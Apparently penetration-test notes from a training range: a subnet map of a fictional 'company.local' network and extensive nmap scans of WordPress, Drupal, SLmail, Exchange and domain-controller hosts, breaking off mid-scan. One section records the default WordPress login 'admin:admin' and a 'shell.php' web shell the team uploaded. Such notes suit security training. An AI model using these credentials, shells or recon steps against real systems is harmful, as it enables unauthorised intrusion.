# Buffer
## ips
Name |IP
:-:|:-:
DMZ |10.11.2.0/24
SERVERS | 10.11.3.0/24
OFFICE |10.11.4.0/24
ASU_TP1 |10.11.239.0/24
ASU_TP1|10.11.240.0/24
## ips new
**10.11.2.0:**
Name |IP
:-:|:-:
WordPress |[10.11.2.10](http://10.11.2.10/)
Atrium | [10.11.2.11](http://10.11.2.11/)
SLmail |10.11.2.12
DNS |10.11.2.53
**10.11.3.0:**
Name |IP
:-:|:-:
Active Drirectory(?) | 10.11.3.10
mx1.company.local | 10.11.3.20
Active Drirectory(?) | 10.11.3.50
**10.11.4.0:**
Name | IP
:-:|:-:
custarm.company.local | 10.11.4.6
??(винда) |10.11.4.8
Microsoft Terminal Services (?) |10.11.4.10
Забыли | 10.11.4.13
**10.11.239.0:**
Name | IP
:-:|:-:
Веб + Microsoft SQL Server | 10.11.239.5
??(винда) | 10.11.239.6
**10.11.240.0:**
Name | IP
:-:|:-:
Веб(JBoss) | 10.11.240.5
Веб(JBoss) | 10.11.240.6
Веб(JBoss) | 10.11.240.9
Веб(JBoss) | 10.11.240.10
??(винда) | 10.11.240.14
## 10.11.2.0
### nmap
```bash
nmap 10.11.2.10-12,53 -sV
Host is up (0.0029s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open http nginx 1.14.2
3306/tcp open mysql MySQL (unauthorized)
8080/tcp open http nginx 1.14.2
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Nmap scan report for 10.11.2.11
Host is up (0.0028s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5 (protocol 2.0)
80/tcp open http Apache httpd 2.4.10 ((Debian))
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
Service Info: Host: CLEAN-DRUPAL; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Nmap scan report for 10.11.2.12
Host is up (0.0037s latency).
Not shown: 985 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH for_Windows_8.6 (protocol 2.0)
25/tcp open smtp SLmail smtpd 5.5.0.4433
79/tcp open finger SLMail fingerd
106/tcp open pop3pw SLMail pop3pw
110/tcp open pop3 BVRP Software SLMAIL pop3d
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
3389/tcp open ssl/ms-wbt-server?
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49158/tcp open msrpc Microsoft Windows RPC
Service Info: Host: elto-slmail; OS: Windows; CPE: cpe:/o:microsoft:windows
Nmap scan report for 10.11.2.53
Host is up (0.0041s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5 (protocol 2.0)
53/tcp open domain ISC BIND
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```
```
$ nmap 10.11.2.10-12,53 -A
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-11 10:39 MSK
Nmap scan report for 10.11.2.10
Host is up (0.0044s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 5a:e2:71:5e:bf:f5:f3:22:de:e1:3a:0d:c5:8d:00:24 (RSA)
| 256 05:bc:61:56:22:41:81:35:aa:b0:40:16:0c:47:fe:0e (ECDSA)
|_ 256 5e:fe:5a:ad:5d:9e:08:58:09:21:f2:db:97:5d:8d:c9 (ED25519)
80/tcp open http nginx 1.14.2
|_http-server-header: nginx/1.14.2
| http-robots.txt: 1 disallowed entry
|_/wp-admin/
|_http-generator: WordPress 5.9.2
|_http-title: work – Just another WordPress site
3306/tcp open mysql MySQL (unauthorized)
8080/tcp open http nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Site doesn't have a title (text/plain).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Nmap scan report for 10.11.2.11
Host is up (0.0042s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
| 1024 87:7e:d3:a9:f1:17:1b:2d:74:85:e0:c9:b0:22:c6:a3 (DSA)
| 2048 61:04:d9:37:2a:d8:5f:ac:51:ec:c0:64:c4:20:bd:f4 (RSA)
|_ 256 cb:b6:01:57:7a:42:da:50:24:06:43:09:b9:3c:e8:cb (ECDSA)
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-generator: Drupal 7 (http://drupal.org)
|_http-server-header: Apache/2.4.10 (Debian)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-title: CyberPolygon
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.2.14-Debian (workgroup: WORKGROUP)
Service Info: Host: ELTO-PORTAL2; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_smb2-time: Protocol negotiation failed (SMB2)
|_nbstat: NetBIOS name: ELTO-PORTAL2, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-security-mode:
| 3.0:
|_ Message signing enabled but not required
|_clock-skew: mean: -6s, deviation: 0s, median: -7s
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.2.14-Debian)
| Computer name: \x00
| NetBIOS computer name: ELTO-PORTAL2\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2022-03-11T07:40:54+00:00
Nmap scan report for 10.11.2.12
Host is up (0.0047s latency).
Not shown: 985 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH for_Windows_8.6 (protocol 2.0)
| ssh-hostkey:
| 3072 23:18:fc:38:62:8f:3d:aa:48:f3:f0:48:8d:17:c5:55 (RSA)
| 256 1b:ba:74:cf:1b:cd:36:cf:0c:09:c1:f3:e4:d3:d0:7f (ECDSA)
|_ 256 49:0f:d6:2a:5b:fd:ec:04:ed:17:5a:8f:0b:a4:1d:77 (ED25519)
25/tcp open smtp SLmail smtpd 5.5.0.4433
| smtp-commands: elto-slmail, SIZE 100000000, SEND, SOML, SAML, HELP, VRFY, EXPN, ETRN, XTRN
|_ This server supports the following commands. HELO MAIL RCPT DATA RSET SEND SOML SAML HELP NOOP QUIT
79/tcp open finger SLMail fingerd
|_finger: Finger online user list request denied.\x0D
106/tcp open pop3pw SLMail pop3pw
110/tcp open pop3 BVRP Software SLMAIL pop3d
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp open ssl/ms-wbt-server?
|_ssl-date: 2022-03-11T07:41:13+00:00; 0s from scanner time.
| rdp-ntlm-info:
| Target_Name: ELTO-SLMAIL
| NetBIOS_Domain_Name: ELTO-SLMAIL
| NetBIOS_Computer_Name: ELTO-SLMAIL
| DNS_Domain_Name: elto-slmail
| DNS_Computer_Name: elto-slmail
| Product_Version: 6.1.7601
|_ System_Time: 2022-03-11T07:41:01+00:00
| ssl-cert: Subject: commonName=elto-slmail
| Not valid before: 2022-02-17T05:46:48
|_Not valid after: 2022-08-19T05:46:48
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49158/tcp open msrpc Microsoft Windows RPC
Service Info: Host: elto-slmail; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2022-03-11T07:41:01
|_ start_date: 2022-02-18T14:12:01
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_clock-skew: mean: -35m59s, deviation: 1h20m29s, median: 0s
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: elto-slmail
| NetBIOS computer name: ELTO-SLMAIL\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2022-03-11T10:41:01+03:00
| smb2-security-mode:
| 2.1:
|_ Message signing enabled but not required
|_nbstat: NetBIOS name: ELTO-SLMAIL, NetBIOS user: <unknown>, NetBIOS MAC: fa:16:3e:90:76:1c (unknown)
Nmap scan report for 10.11.2.53
Host is up (0.0041s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
| 3072 62:10:fe:e0:81:28:b2:3c:84:b7:4b:69:6c:ec:6c:04 (RSA)
| 256 a9:06:0f:94:5f:77:6b:50:f1:49:5b:0f:7a:6b:b5:6b (ECDSA)
|_ 256 b6:7d:84:d7:5e:81:9e:cc:0a:e5:f1:3a:e9:45:84:40 (ED25519)
53/tcp open domain ISC BIND
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 4 IP addresses (4 hosts up) scanned in 96.96 seconds
```
### .10 (WordPress)
http://10.11.2.10/wp-login.php
admin:admin
http://10.11.2.10/shell.php - sami podnyali
### .11
```bash
nmap -A 10.11.2.11
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-10 09:53 MSK
Stats: 0:00:06 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Nmap scan report for 10.11.2.11
Host is up (0.0034s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
| 1024 87:7e:d3:a9:f1:17:1b:2d:74:85:e0:c9:b0:22:c6:a3 (DSA)
| 2048 61:04:d9:37:2a:d8:5f:ac:51:ec:c0:64:c4:20:bd:f4 (RSA)
|_ 256 cb:b6:01:57:7a:42:da:50:24:06:43:09:b9:3c:e8:cb (ECDSA)
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-generator: Drupal 7 (http://drupal.org)
|_http-title: CyberPolygon
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.2.14-Debian (workgroup: WORKGROUP)
Service Info: Host: CLEAN-DRUPAL; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: -1m04s, deviation: 0s, median: -1m04s
| smb2-security-mode:
| 3.0:
|_ Message signing enabled but not required
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_nbstat: NetBIOS name: CLEAN-DRUPAL, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-time:
| date: 2022-03-10T06:52:33
|_ start_date: N/A
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.2.14-Debian)
| Computer name: \x00
| NetBIOS computer name: CLEAN-DRUPAL\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2022-03-10T06:52:33+00:00
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.61 seconds
```
### buf
## 10.11.3.0
### nmap
```bash
nmap 10.11.3.10,20,50 -sV
Nmap scan report for 10.11.3.10
Host is up (0.0054s latency).
Not shown: 987 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-03-10 05:55:47Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: company.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: company.local0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
5357/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
Service Info: Host: NS2; OS: Windows; CPE: cpe:/o:microsoft:windows
Nmap scan report for 10.11.3.20
Host is up (0.0036s latency).
Not shown: 973 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
25/tcp open smtp Microsoft Exchange smtpd
80/tcp open http Microsoft IIS httpd 10.0
81/tcp open http Microsoft IIS httpd 10.0
110/tcp open pop3 Microsoft Exchange 2007-2010 pop3d
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
443/tcp open ssl/http Microsoft IIS httpd 10.0
444/tcp open ssl/http Microsoft IIS httpd 10.0
445/tcp open microsoft-ds?
465/tcp open smtp Microsoft Exchange smtpd
587/tcp open smtp Microsoft Exchange smtpd
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
808/tcp open ccproxy-http?
995/tcp open ssl/pop3 Microsoft Exchange 2007-2010 pop3d
1801/tcp open msmq?
2103/tcp open msrpc Microsoft Windows RPC
2105/tcp open msrpc Microsoft Windows RPC
2107/tcp open msrpc Microsoft Windows RPC
2525/tcp open smtp Microsoft Exchange smtpd
3389/tcp open ms-wbt-server Microsoft Terminal Services
3800/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
3801/tcp open mc-nmf .NET Message Framing
3828/tcp open mc-nmf .NET Message Framing
6001/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
6007/tcp open msrpc Microsoft Windows RPC
6123/tcp open msrpc Microsoft Windows RPC
6543/tcp open msrpc Microsoft Windows RPC
Service Info: Host: mx1.company.local; OS: Windows; CPE: cpe:/o:microsoft:windows
Nmap scan report for 10.11.3.50
Host is up (0.0041s latency).
Not shown: 988 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-03-10 05:55:58Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: company.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: company.local0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
Service Info: Host: NS1; OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 7 IP addresses (7 hosts up) scanned in 66.04 seconds
```
```
└─$ nmap 10.11.3.10,20,50 -A
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-11 10:43 MSK
Nmap scan report for 10.11.3.10
Host is up (0.74s latency).
Not shown: 987 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-03-11 07:44:01Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: company.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: company.local0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2022-03-11T07:45:24+00:00; 0s from scanner time.
| rdp-ntlm-info:
| Target_Name: company
| NetBIOS_Domain_Name: company
| NetBIOS_Computer_Name: NS2
| DNS_Domain_Name: company.local
| DNS_Computer_Name: ns2.company.local
| DNS_Tree_Name: company.local
| Product_Version: 10.0.17763
|_ System_Time: 2022-03-11T07:45:01+00:00
| ssl-cert: Subject: commonName=ns2.company.local
| Not valid before: 2022-02-17T12:44:25
|_Not valid after: 2022-08-19T12:44:25
5357/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable
Service Info: Host: NS2; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2022-03-11T07:45:07
|_ start_date: N/A
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
Nmap scan report for 10.11.3.20
Host is up (0.0017s latency).
Not shown: 973 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
25/tcp open smtp Microsoft Exchange smtpd
| smtp-commands: mx1.company.local Hello [10.11.5.10], SIZE 37748736, PIPELINING, DSN, ENHANCEDSTATUSCODES, STARTTLS, X-ANONYMOUSTLS, AUTH NTLM, X-EXPS GSSAPI NTLM, 8BITMIME, BINARYMIME, CHUNKING, SMTPUTF8, XRDST
|_ This server supports the following commands: HELO EHLO STARTTLS RCPT DATA RSET MAIL QUIT HELP AUTH BDAT
| ssl-cert: Subject: commonName=mx1
| Subject Alternative Name: DNS:mx1, DNS:mx1.company.local
| Not valid before: 2022-02-18T13:18:55
|_Not valid after: 2027-02-18T13:18:55
| smtp-ntlm-info:
| Target_Name: company
| NetBIOS_Domain_Name: company
| NetBIOS_Computer_Name: MX1
| DNS_Domain_Name: company.local
| DNS_Computer_Name: mx1.company.local
| DNS_Tree_Name: company.local
|_ Product_Version: 10.0.17763
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: Site doesn't have a title.
|_http-server-header: Microsoft-IIS/10.0
81/tcp open http Microsoft IIS httpd 10.0
|_http-title: 403 - Forbidden: Access is denied.
|_http-server-header: Microsoft-IIS/10.0
110/tcp open pop3 Microsoft Exchange 2007-2010 pop3d
|_pop3-capabilities: TOP STLS UIDL
| ssl-cert: Subject: commonName=mx1
| Subject Alternative Name: DNS:mx1, DNS:mx1.company.local
| Not valid before: 2022-02-18T13:18:55
|_Not valid after: 2027-02-18T13:18:55
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
443/tcp open ssl/http Microsoft IIS httpd 10.0
| http-title: Outlook
|_Requested resource was https://10.11.3.20/owa/auth/logon.aspx?url=https%3a%2f%2f10.11.3.20%2fowa%2f&reason=0
| ssl-cert: Subject: commonName=mx1
| Subject Alternative Name: DNS:mx1, DNS:mx1.company.local
| Not valid before: 2022-02-18T13:18:55
|_Not valid after: 2027-02-18T13:18:55
|_http-server-header: Microsoft-IIS/10.0
444/tcp open ssl/http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| ssl-cert: Subject: commonName=mx1
| Subject Alternative Name: DNS:mx1, DNS:mx1.company.local
| Not valid before: 2022-02-18T13:18:55
|_Not valid after: 2027-02-18T13:18:55
|_http-title: Runtime Error
| http-methods:
|_ Potentially risky methods: TRACE
445/tcp open microsoft-ds?
465/tcp open smtp Microsoft Exchange smtpd
| smtp-commands: mx1.company.local Hello [10.11.5.10], SIZE 37748736, PIPELINING, DSN, ENHANCEDSTATUSCODES, STARTTLS, X-ANONYMOUSTLS, AUTH GSSAPI NTLM, X-EXPS GSSAPI NTLM, 8BITMIME, BINARYMIME, CHUNKING, XEXCH50, SMTPUTF8, XRDST, XSHADOWREQUEST
|_ This server supports the following commands: HELO EHLO STARTTLS RCPT DATA RSET MAIL QUIT HELP AUTH BDAT
| smtp-ntlm-info:
| Target_Name: company
| NetBIOS_Domain_Name: company
| NetBIOS_Computer_Name: MX1
| DNS_Domain_Name: company.local
| DNS_Computer_Name: mx1.company.local
| DNS_Tree_Name: company.local
|_ Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=mx1
| Subject Alternative Name: DNS:mx1, DNS:mx1.company.local
| Not valid before: 2022-02-18T13:18:55
|_Not valid after: 2027-02-18T13:18:55
587/tcp open smtp Microsoft Exchange smtpd
| smtp-commands: mx1.company.local Hello [10.11.5.10], SIZE 37748736, PIPELINING, DSN, ENHANCEDSTATUSCODES, STARTTLS, AUTH GSSAPI NTLM, 8BITMIME, BINARYMIME, CHUNKING, SMTPUTF8
|_ This server supports the following commands: HELO EHLO STARTTLS RCPT DATA RSET MAIL QUIT HELP AUTH BDAT
| ssl-cert: Subject: commonName=mx1
| Subject Alternative Name: DNS:mx1, DNS:mx1.company.local
| Not valid before: 2022-02-18T13:18:55
|_Not valid after: 2027-02-18T13:18:55
| smtp-ntlm-info:
| Target_Name: company
| NetBIOS_Domain_Name: company
| NetBIOS_Computer_Name: MX1
| DNS_Domain_Name: company.local
| DNS_Computer_Name: mx1.company.local
| DNS_Tree_Name: company.local
|_ Product_Version: 10.0.17763
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
808/tcp open ccproxy-http?
995/tcp open ssl/pop3 Microsoft Exchange 2007-2010 pop3d
| ssl-cert: Subject: commonName=mx1
| Subject Alternative Name: DNS:mx1, DNS:mx1.company.local
| Not valid before: 2022-02-18T13:18:55
|_Not valid after: 2027-02-18T13:18:55
|_pop3-capabilities: TOP SASL(PLAIN) USER UIDL
1801/tcp open msmq?
2103/tcp open msrpc Microsoft Windows RPC
2105/tcp open msrpc Microsoft Windows RPC
2107/tcp open msrpc Microsoft Windows RPC
2525/tcp open smtp Microsoft Exchange smtpd
| smtp-commands: mx1.company.local Hello [10.11.5.10], SIZE, PIPELINING, DSN, ENHANCEDSTATUSCODES, STARTTLS, X-ANONYMOUSTLS, AUTH NTLM, X-EXPS GSSAPI NTLM, 8BITMIME, BINARYMIME, CHUNKING, XEXCH50, SMTPUTF8, XRDST, XSHADOWREQUEST
|_ This server supports the following commands: HELO EHLO STARTTLS RCPT DATA RSET MAIL QUIT HELP AUTH BDAT
| ssl-cert: Subject: commonName=mx1
| Subject Alternative Name: DNS:mx1, DNS:mx1.company.local
| Not valid before: 2022-02-18T13:18:55
|_Not valid after: 2027-02-18T13:18:55
| smtp-ntlm-info:
| Target_Name: company
| NetBIOS_Domain_Name: company
| NetBIOS_Computer_Name: MX1
| DNS_Domain_Name: company.local
| DNS_Computer_Name: mx1.company.local
| DNS_Tree_Name: company.local
|_ Product_Version: 10.0.17763
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: company
| NetBIOS_Domain_Name: company
| NetBIOS_Computer_Name: MX1
| DNS_Domain_Name: company.local
| DNS_Computer_Name: mx1.company.local
| DNS_Tree_Name: company.local
| Product_Version: 10.0.17763
|_ System_Time: 2022-03-11T07:45:06+00:00
| ssl-cert: Subject: commonName=mx1.company.local
| Not valid before: 2022-02-17T12:50:03
|_Not valid after: 2022-08-19T12:50:03
3800/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
3801/tcp open mc-nmf .NET Message Framing
3828/tcp open mc-nmf .NET Message Framing
6001/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
6007/tcp open msrpc Microsoft Windows RPC
6123/tcp open msrpc Microsoft Windows RPC
6543/tcp open msrpc Microsoft Windows RPC
Service Info: Host: mx1.company.local; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
| smb2-time:
| date: 2022-03-11T07:45:08
|_ start_date: N/A
Nmap scan report for 10.11.3.50
Host is up (0.0072s latency).
Not shown: 988 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-03-11 07:44:07Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: company.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: company.local0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2022-03-11T07:45:24+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=ns1.company.local
| Not valid before: 2022-02-17T12:30:36
|_Not valid after: 2022-08-19T12:30:36
| rdp-ntlm-info:
| Target_Name: company
| NetBIOS_Domain_Name: company
| NetBIOS_Computer_Name: NS1
| DNS_Domain_Name: company.local
| DNS_Computer_Name: ns1.company.local
| DNS_Tree_Name: company.local
| Product_Version: 10.0.17763
|_ System_Time: 2022-03-11T07:45:04+00:00
Service Info: Host: NS1; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
| smb2-time:
| date: 2022-03-11T07:45:13
|_ start_date: N/A
Post-scan script results:
| clock-skew:
| 0s:
| 10.11.3.20
| 10.11.3.10
|_ 10.11.3.50
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 3 IP addresses (3 hosts up) scanned in 91.36 seconds
```
### buf
## 10.11.4.0
### nmap
```bash
nmap 10.11.4.6,8,10,13 -sV
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-10 09:06 MSK
Nmap scan report for 10.11.4.6
Host is up (0.0022s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
3389/tcp open ms-wbt-server Microsoft Terminal Services
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Nmap scan report for 10.11.4.8
Host is up (0.0021s latency).
Not shown: 991 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH for_Windows_8.6 (protocol 2.0)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: company)
3389/tcp open ssl/ms-wbt-server?
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49175/tcp open msrpc Microsoft Windows RPC
Service Info: Host: BUCHGARM; OS: Windows; CPE: cpe:/o:microsoft:windows
Nmap scan report for 10.11.4.10
Host is up (0.66s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
3389/tcp open ms-wbt-server Microsoft Terminal Services
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Nmap scan report for 10.11.4.13
Host is up (0.0036s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
3389/tcp open ms-wbt-server Microsoft Terminal Services
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 4 IP addresses (4 hosts up) scanned in 81.60 seconds
```
```
─$ nmap 10.11.4.6,8,10,13 -A
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-11 10:48 MSK
Nmap scan report for 10.11.4.6
Host is up (0.012s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: company
| NetBIOS_Domain_Name: company
| NetBIOS_Computer_Name: CUSTARM
| DNS_Domain_Name: company.local
| DNS_Computer_Name: custarm.company.local
| DNS_Tree_Name: company.local
| Product_Version: 10.0.17763
|_ System_Time: 2022-03-11T07:50:21+00:00
| ssl-cert: Subject: commonName=custarm.company.local
